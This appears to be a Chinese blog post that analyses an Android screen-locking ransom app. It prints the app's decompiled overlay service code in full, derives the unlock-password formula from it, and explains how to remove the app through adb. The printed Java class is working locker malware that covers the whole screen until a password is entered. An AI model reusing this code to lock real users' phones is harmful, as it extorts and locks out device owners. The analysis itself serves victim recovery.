今天有个朋友给我一个有毒App,“不小心”装上去,出现如下情况:

真恶心….居然来个这玩意儿,手机数据暂时不想被删除。尝试反编译App,寻找思路。
反编译得到AndroidManifest.xml文件,得知服务为启动:<service android:name=”.Floatw”/>
嗯,那就找Floatw.class源码文件,编译dex文件为jar,打开jar源码,寻找Floatw.class文件,如下:
public class Floatw extends Service{ long jv; private LinearLayout mFloatLayout; private Handler mHandler; private Runnable mRunnable = new Runnable() { @Override public void run() { Object localObject = (TextView)Floatw.access$L1000002(Floatw.this).findViewById(2131099649); String str = Floatw.this.getResources().getString(2130968586); ((TextView)localObject).setText(str + String.valueOf(Floatw.this.number)); localObject = (EditText)Floatw.access$L1000002(Floatw.this).findViewById(2131099650); ((Button)Floatw.access$L1000002(Floatw.this).findViewById(2131099651)).setOnClickListener(new View.OnClickListener() { private final EditText val$etext; @Override public void onClick(View paramAnonymous2View) { int i = Floatw.this.my_password; if (this.val$etext.getText().toString().equals(String.valueOf(i))) { paramAnonymous2View = Floatw.this; Floatw localFloatw = Floatw.this; try { Class localClass = Class.forName("com.dedett.qqzan.Floatw"); paramAnonymous2View.stopService(new Intent(localFloatw, localClass)); return; } catch (ClassNotFoundException paramAnonymous2View) { throw new NoClassDefFoundError(paramAnonymous2View.getMessage()); } } paramAnonymous2View = (TextView)Floatw.access$L1000002(Floatw.this).findViewById(2131099652); paramAnonymous2View.setText(Floatw.this.getResources().getString(2130968588)); new Handler().postDelayed(new Runnable() { private final TextView val$false_text; @Override public void run() { this.val$false_text.setText((CharSequence)null); } }, '?'); } }); } }; private WindowManager mWindowManager; int my_password = (this.number - 3055) * 3 - 8985; int number = (int)((Math.random() + 1) * 100000); private WindowManager.LayoutParams wmParams; private void createFloatView() { this.wmParams = new WindowManager.LayoutParams(); Application localApplication = getApplication(); getApplication(); this.mWindowManager = ((WindowManager)localApplication.getSystemService(Context.WINDOW_SERVICE)); this.wmParams.type = 2010; this.wmParams.format = 1; this.wmParams.flags = 1280; this.wmParams.width = -1; this.wmParams.height = -1; this.mFloatLayout = ((LinearLayout)LayoutInflater.from(getApplication()).inflate(2130903041, (ViewGroup)null)); this.mWindowManager.addView(this.mFloatLayout, this.wmParams); this.mFloatLayout.measure(View.MeasureSpec.makeMeasureSpec(0, 0), View.MeasureSpec.makeMeasureSpec(0, 0)); } @Override public IBinder onBind(Intent paramIntent) { return (IBinder)null; } @Override public void onCreate() { super.onCreate(); createFloatView(); this.mHandler = new Handler() { @Override public void handleMessage(Message paramAnonymousMessage) { super.handleMessage(paramAnonymousMessage); if (paramAnonymousMessage.what == 1) {} } }; } @Override public void onDestroy() { this.mHandler.removeCallbacks(this.mRunnable); if (this.mFloatLayout != null) { this.mWindowManager.removeView(this.mFloatLayout); } super.onDestroy(); } @Override public void onStart(Intent paramIntent, int paramInt) { this.mHandler.postDelayed(this.mRunnable, 0); }}
从中可以看出这一段:
int my_password = (this.number - 3055) * 3 - 8985;int number = (int)((Math.random() + 1) * 100000);
定义一个随机数,这个随机数+1,然后在乘以100000,得到的就是那个序列号….
那解锁密码就是,(序列号-3055)*3-8985
嗯,这样….那我的密码是:508128
至于刷机,双清无效,,估计是忽悠人的,在源码没看到相关的源码。
有Roor情况下,可以用电脑adb进入data/app/删除com.dedett.qqzan软件即可。
收藏思路,感谢作者
0条评论